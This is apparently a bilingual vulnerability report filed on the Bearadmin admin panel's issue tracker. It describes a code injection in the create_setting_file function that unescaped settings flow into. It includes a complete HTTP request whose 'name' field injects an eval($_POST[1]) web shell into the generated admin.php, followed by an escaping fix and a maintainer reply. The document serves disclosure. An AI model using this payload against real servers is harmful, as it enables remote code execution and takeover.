Bearadmin background code injection causes GetShell

[lengf233]

漏洞分析 Vulnerability analysis

这个漏洞位于app/admin/common.php中的create_setting_file函数这里，对于后台修改操作传入的数据没有做任何处理就生成了配置文件。

This vulnerability lies in the create_setting_ file function in create_setting_ common.php, which generates a configuration file without doing any processing to the data passed in the backend modification operation.

$file_code = "<?php\r\n/**\r\n* " .
            $data->name . ':' . $data->description .
            "\r\n* 此配置文件为自动生成，生成时间" . date('Y-m-d H:i:s') .
            "\r\n*/\r\n\r\nreturn [";
        foreach ($setting as $value) {
            $file_code .= "\r\n    // " . $value['name'] . ':' . $value['description'] . "\r\n    '" . $value['code'] . "'=>[";
            foreach ($value->content as $content) {
                if (is_array($content['content'])) {
                    $content['content'] = implode(',', $content['content']);

                }
                $file_code .= "\r\n    // " . $content['name'] . "\r\n    '" .
                    $content['field'] . "'=>'" . $content['content'] . "',";

            }
            $file_code .= "\r\n],";
        }
        $file_code .= "\r\n];";

导致在进行后台设置时产生了任意代码注入。

Results in arbitrary code injection during background setup.

漏洞复现 Vulnerability Reproduction

数据包：

Data package:

POST /index.php/admin/setting/update.html HTTP/1.1
Host: badmin.com
Content-Length: 1051
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjpBKukHjGOJd7FL0
Origin: http://badmin.com
Referer: http://badmin.com/index.php/admin/setting/admin.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-GB;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: AppSId=b270c2ec094b300276f41e6235e52111; device_id_uid_2=7535e03c33438ab36562e92183b6380fe4f15c19; DarkMode=0; HeaderFixed=0; DropdownLegacyOffset=0; NoBorder=0; SidebarCollapsed=0; SidebarFixed=0; SidebarMini=0; SidebarMiniMd=0; SidebarMiniXs=0; FlatSidebar=0; LegacySidebar=0; CompactSidebar=0; ChildIndentSidebar=0; ChildHideSidebar=0; NoExpandSidebar=0; FootFixed=0; TextSmBody=0; TextSmHeader=0; TextSmBrand=0; TextSmSidebar=0; TextSmFooter=0
Connection: close

------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="name"

XX后台系统'.eval($_POST[1]).'
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="short_name"

后台
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="author"

xx科技
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="website"

#
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="version"

0.1
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="logo_file"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="logo"

/static/admin/images/logo.png
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="__token__"

11e6f7eadc0edc07bce93d111408c05e
------WebKitFormBoundaryjpBKukHjGOJd7FL0--

修改之后结果：

The result after modification:

生成的admin.php中包恶意代码，攻击者可通过此处入侵服务器。

Malicious code is included in the generated admin.php, through which an attacker can invade the server.

修复建议 Repair suggestion

• 对于用户输入的字符进行转义处理 Escape the characters entered by the user

[yupoxiong]

已临时处理，感谢反馈